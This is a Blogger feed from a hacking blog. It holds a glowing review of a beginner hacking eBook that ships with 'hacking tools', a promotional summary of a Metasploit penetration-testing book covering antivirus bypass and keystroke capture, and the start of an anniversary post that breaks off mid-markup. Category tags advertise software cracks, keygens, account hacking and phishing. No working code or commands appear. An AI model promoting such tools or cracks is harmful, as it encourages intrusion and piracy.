<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:blogger='http://schemas.google.com/blogger/2008' xmlns:georss='http://www.georss.org/georss' xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7708828398385990720</id><updated>2018-07-30T10:16:41.313+05:30</updated><category term="technical article"/><category term="hacking"/><category term="cracking"/><category term="technology news"/><category term="hacking tutorial"/><category term="latest cyber news"/><category term="facebook"/><category term="software"/><category term="tips and tricks"/><category term="google"/><category term="crack"/><category term="cyber terror"/><category term="serials and keys"/><category term="windows"/><category term="hack a website/web server"/><category term="facebook spam"/><category term="hacking web applications"/><category term="sql injection tool"/><category term="windows 7"/><category term="windows hacking"/><category term="Kaspersky pure key"/><category term="anti virus"/><category term="google plus"/><category term="kaspersky antivirus 2012 key"/><category term="kaspersky internet security 2012 key"/><category term="facebook hacking"/><category term="ARP spoofing/poisoning"/><category term="assembly language"/><category term="email hacking"/><category term="exploit"/><category term="google plus invitation"/><category term="hacking software"/><category term="microsoft"/><category term="nmap"/><category term="reverse engineering"/><category term="wikileaks"/><category term="RAT"/><category term="anonymous hacking group"/><category term="backtrack"/><category term="cain and able"/><category term="cloud computing"/><category term="ebullience 2011"/><category term="f8 live streaming"/><category term="hack the darklord"/><category term="hacking gmail"/><category term="hacking questions"/><category term="idm 6 full download"/><category term="idm crack"/><category term="keyloggers"/><category term="port scanning"/><category term="webscarab"/><category term="windows firewall"/><category term="windows hackking"/><category term="wireshark"/><category term="#refref"/><category term="John the riper"/><category term="LOIC"/><category term="M.S Dhoni website hack"/><category term="Nessus"/><category term="OWASP webgoat"/><category term="Pangolin"/><category term="Priety zinta website hack"/><category term="Priyanka chopra website hack"/><category term="SOPA"/><category term="Search engine optimization"/><category term="THC Dos"/><category term="Windows 8"/><category term="android hacking"/><category term="anna hazare"/><category term="backup"/><category term="blog widgets"/><category term="blogging"/><category term="browser war"/><category term="crome"/><category term="difference between lokpal and jan lokpal"/><category term="download #refref"/><category term="download idm 6"/><category term="facebook timeline"/><category term="fake facebook wall"/><category term="fake twitter"/><category term="farmville hack"/><category term="hacking shopping websites/portals"/><category term="hacking survey sites"/><category term="honeypots"/><category term="internet censorship"/><category term="jan lokpal bill"/><category term="keygen"/><category term="online hacking challenge"/><category term="open source"/><category term="phishing"/><category term="rapidshare hacks"/><category term="recovery"/><category term="shady RAT"/><category term="steve jobs"/><category term="steve jobs dies"/><category term="super scan"/><category term="xss attack"/><title type='text'>Hacking Alert</title><subtitle type='html'>Computer Tricks and Hacks. Hacking Software and much more ...</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default?start-index=26&amp;max-results=25'/><author><name>John Jacob</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>236</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>25</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-2210707295811261979</id><published>2013-10-24T19:39:00.000+05:30</published><updated>2013-10-24T19:39:45.902+05:30</updated><title type='text'>Review of Hackbook - Beginner&#39;s guide to hacking</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;Hello my dear readers. I recently bought this awesome eBook called &quot;&lt;a href=&quot;http://hackbook.net/&quot;&gt;Hackbook&lt;/a&gt;&quot;. I was surprised to find that it was very informative and useful even for a person like me who has been into hacking for quite a while now. As the author of the eBook is quite reputed in the hacking world.I did not hesitate to write a review of it.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-UPtCfmeLv_U/UmknNYMAYII/AAAAAAAAAns/ppH9Z-eZVL0/s1600/hack.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;300&quot; src=&quot;http://2.bp.blogspot.com/-UPtCfmeLv_U/UmknNYMAYII/AAAAAAAAAns/ppH9Z-eZVL0/s400/hack.jpg&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;ol style=&quot;text-align: left;&quot;&gt;&lt;li style=&quot;margin: 0px 0px 0.25em; padding: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Non technical writing for easy understanding&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;&lt;li style=&quot;margin: 0px 0px 0.25em; padding: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Descriptive screenshots to explain better&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;&lt;li style=&quot;margin: 0px 0px 0.25em; padding: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Powerful Tools&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;&lt;li style=&quot;margin: 0px 0px 0.25em; padding: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;50 Pages of &amp;nbsp;&quot;NO BULLSHIT&quot;&amp;nbsp;content&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;&lt;li style=&quot;margin: 0px 0px 0.25em; padding: 0px;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;Each section is independent of the previous section (Around 3-4 pages of each section)&lt;/span&gt;&lt;/b&gt;&lt;/li&gt;&lt;/ol&gt;The above features is what is mentioned in their sample page. So I will address as to how far what they have stated there is true to the buyer.&lt;br /&gt;&lt;br /&gt;First off, the writing. The writing isn&#39;t technical. COMPLETELY AGREED. But the usage of technical words is important later on in the eBook is something you will find. The upside is that, he explained EVERY single technical keyword at some point of time in the eBook. &lt;br /&gt;&lt;br /&gt;Second, the tools.. I was quite surprised when I actually received Hacking Tools.I felt a bit dangerous for a second :P But the most important fact is that I didn&#39;t expect anyone to give off free hacking tools along with it. And along with the links that are available in the eBook, you can gather a Hell load of hacking arsenal and learn more than you can imagine.&lt;br /&gt;&lt;br /&gt;Third, Coding, Though he doesn&#39;t teach you the whole of coding in the book (which is near impossible for any writer). He stressed well on the importance of learning coding to become a successful and professional Hacker.&lt;br /&gt;&lt;br /&gt;There hell load of pictures. The moment you read one of his screenshots you get a very good picture as to how to go about with the tool. The screenshots and &quot;In-Picture&quot; explanation is definitely a boost to the reading.&lt;br /&gt;&lt;br /&gt;And as far as NO BULLSHIT content is concerned. There is only an &quot;Introduction&quot; page which has according to be the only non- informational page on the eBook!&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;color: red; font-size: large;&quot;&gt;&lt;b&gt;I say this is a MUST buy book for a newbie hacker!&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;Check out their Book&lt;b&gt;:&lt;/b&gt; &lt;a href=&quot;http://www.hackbook.net/&quot;&gt;&lt;b&gt;Hackbook - Learn How to Hack eBook&lt;/b&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/2210707295811261979/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2013/10/review-of-hackbook-learn-how-to-hack.html#comment-form' title='18 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2210707295811261979'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/2210707295811261979'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2013/10/review-of-hackbook-learn-how-to-hack.html' title='Review of Hackbook - Beginner&#39;s guide to hacking'/><author><name>John Jacob</name><uri>https://plus.google.com/106998126784730523300</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh4.googleusercontent.com/-LAkRbpooLR0/AAAAAAAAAAI/AAAAAAAAAlc/fuxyxNyvKhM/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-UPtCfmeLv_U/UmknNYMAYII/AAAAAAAAAns/ppH9Z-eZVL0/s72-c/hack.jpg" height="72" width="72"/><thr:total>18</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-5188438052902961726</id><published>2012-08-23T21:37:00.000+05:30</published><updated>2012-08-23T21:37:02.871+05:30</updated><title type='text'>Metasploit penetration testing Cookbook released!</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-size: 9.0pt; line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-size: 9.0pt; line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://2.bp.blogspot.com/-ECx3T6Dw6ec/UDZUZCnV6TI/AAAAAAAABFY/PsPcAQBQdFc/s1600/book.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;320&quot; src=&quot;http://2.bp.blogspot.com/-ECx3T6Dw6ec/UDZUZCnV6TI/AAAAAAAABFY/PsPcAQBQdFc/s320/book.jpg&quot; width=&quot;259&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-size: 9.0pt; line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Metasploit® software helps security and IT professionals identify security issues, verify vulnerability mitigations, and manage expert-driven security assessments. Capabilities include smart exploitation, password auditing, web application scanning, and social engineering. Teams can collaborate in Metasploit and present their findings in consolidated reports. The goal of the software is to provide a clear understanding of the critical vulnerabilities in any environment and to manage those risks.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;&lt;a href=&quot;http://www.packtpub.com/metasploit-penetration-testing-cookbook/book&quot; target=&quot;_blank&quot;&gt;MetasploitPenetration Testing Cookbook&lt;/a&gt;, By Abhinav Singh, targets both professionals and beginners to the framework. The chapters of the book are logically arranged with an increasing level of complexity and cover Metasploit aspects ranging from pre-exploitation to the post-exploitation phase thoroughly. The recipe structure of the book provides a good mix of both theoretical understanding and practical implementation.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;This book will help readers in thinking from a hacker’s perspective to dig out the flaws in target networks and also to leverage the powers of Metasploit to compromise them. It will take your penetration skills to the next level.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;The book starts with the basics such as gathering information about your target and gradually covers advanced topics like building your own framework scripts and modules. The book goes deep into operating systems-based penetration testing techniques and moves ahead with client-based exploitation methodologies. In the post- exploitation phase, it covers meterpreter, antivirus bypass, ruby wonders, exploit building, porting exploits to framework, and third party tools like armitage, and SET.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;What you will learn from this book&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l0 level1 lfo1; text-indent: -18.0pt;&quot;&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Set up a complete penetration testing environment using metasploit and virtual machines&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Learn to penetration-test popular operating systems such as Windows7, Windows 2008 Server, Ubuntu etc.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Get familiar with penetration testing based on client side exploitation techniques with detailed analysis of vulnerabilities and codes&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Avail of exclusive coverage of antivirus bypassing techniques using metasploit&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Master post-exploitation techniques such as exploring the target, keystrokes capturing, sniffing, pivoting, setting persistent connections etc.&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Build and analyze meterpreter scripts in Ruby&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Build and export exploits to framework&lt;/span&gt;&lt;/li&gt;&lt;li&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%; text-indent: -18pt;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%; text-indent: -18pt;&quot;&gt;Use extension tools like Armitage, SET etc.&lt;/span&gt;&lt;/li&gt;&lt;/ul&gt;&lt;!--[if !supportLists]--&gt;&lt;br /&gt;                &lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Approach&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;This is a Cookbook which follows a practical task-based style. There are plenty of code and commands used for illustration which make your learning curve easy and quick.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Who this book is for&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;This book targets both professional penetration testers as well as new users of Metasploit who wish to gain expertise over the framework. The book requires basic knowledge of scanning, exploitation, and Ruby language.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoNormal&quot;&gt;&lt;b&gt;&lt;u&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Book Details&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpFirst&quot; style=&quot;mso-list: l1 level1 lfo2; text-indent: -18.0pt;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Paperback: 268 pages&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l1 level1 lfo2; text-indent: -18.0pt;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Publisher: Packt Publishing (June 2012)&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l1 level1 lfo2; text-indent: -18.0pt;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;Language: English&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l1 level1 lfo2; text-indent: -18.0pt;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;ISBN-10: 1849517428&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpMiddle&quot; style=&quot;mso-list: l1 level1 lfo2; text-indent: -18.0pt;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;ISBN-13: 978-1849517423&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;MsoListParagraphCxSpLast&quot; style=&quot;mso-list: l1 level1 lfo2; text-indent: -18.0pt;&quot;&gt;&lt;!--[if !supportLists]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;font-family: Symbol; line-height: 115%;&quot;&gt;·&lt;span style=&quot;font-family: &#39;Times New Roman&#39;; line-height: normal;&quot;&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;!--[endif]--&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt;URL: &lt;/span&gt;&lt;span lang=&quot;EN-US&quot;&gt;&lt;a href=&quot;http://www.packtpub.com/metasploit-penetration-testing-cookbook/book&quot;&gt;&lt;span style=&quot;line-height: 115%;&quot;&gt;Metasploit Penetration Testing&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span lang=&quot;EN-US&quot; style=&quot;line-height: 115%;&quot;&gt; Cookbook(Free shipping in India)&lt;span style=&quot;font-size: 9pt;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackingalert.blogspot.com/feeds/5188438052902961726/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackingalert.blogspot.com/2012/08/metasploit-penetration-testing-cookbook.html#comment-form' title='12 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/5188438052902961726'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7708828398385990720/posts/default/5188438052902961726'/><link rel='alternate' type='text/html' href='http://hackingalert.blogspot.com/2012/08/metasploit-penetration-testing-cookbook.html' title='Metasploit penetration testing Cookbook released!'/><author><name>abhinav singh</name><uri>http://www.blogger.com/profile/03102629587741077690</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://2.bp.blogspot.com/_MMJcoBRgsn4/SemPx5VvY3I/AAAAAAAAAA4/VZyEY96SW6o/S220/abhinavbom.jpg'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-ECx3T6Dw6ec/UDZUZCnV6TI/AAAAAAAABFY/PsPcAQBQdFc/s72-c/book.jpg" height="72" width="72"/><thr:total>12</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7708828398385990720.post-2593672862184553912</id><published>2012-01-24T01:23:00.000+05:30</published><updated>2012-01-24T01:24:17.092+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="technical article"/><category scheme="http://www.blogger.com/atom/ns#" term="technology news"/><title type='text'>From free blog hosting to International Author - A journey of 3 years</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;script src=&quot;http://connect.facebook.net/en_US/all.js#xfbml=1&quot;&gt;&lt;/script&gt;&lt;fb:like font=&quot;arial&quot; href=&quot;http://www.facebook.com/pages/HackingAlert/131456493581478&quot; layout=&quot;button_count&quot; show_faces=&quot;true&quot; width=&quot;450&quot;&gt;&lt;/fb:like&gt;&lt;br /&gt;&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;http://1.bp.blogspot.com/--umUwyJcDh8/Tx25Nh93p3I/AAAAAAAABCg/u67WG7vDDrE/s1600/three.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;http://1.bp.blogspot.com/--umUwyJcDh8/Tx25Nh93p3I/AAAAAAAABCg/u67WG7vDDrE/s1600/three.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;Hello Friends and readers. Today HackingAlert completes its 3 years of operation. First of all I would like to apologize for the delay in posts these days as I got a bit busy with relocating to another city. I will be actively blogging again from next month.&lt;br /&gt;&lt;br /&gt;&lt;a name=&#39;more&#39;&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Today is a day of celebration for HackingAlert. The blog has completed 3 years of tough yet successful operation. Over the coarse of time the blog grew slowly and slowly to make an impact in this huge world of web. Writing this post reminds me about the first blog post which was &quot;what is hacking&quot;. I struggled alot while writing it. It was a small post, but while I was writing that post I had never imagined that one day this blog will do wonders for me. It not only helped me in enhancing my knowledge and sharing it, it also helped me to give back something to the community from where I have learnt so much. Over the time, the&amp;nbsp;appreciation&amp;nbsp;and critics made me stronger and forced me to take blogging more seriously. Today I can proudly say that HackingAlert has made a space in the world wide web. Let me take you through some of the stats:&lt;br /&gt;&lt;br /&gt;In past 3 years HackingAlert has&amp;nbsp;traveled&amp;nbsp;all the way from alexa rank of around 30 million( 3 crore) to 1.3 lakh. Alone in India the blog has a traffic rank close to 15,000 and links in more than 120 different websites.&lt;br /&gt;&lt;br /&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a 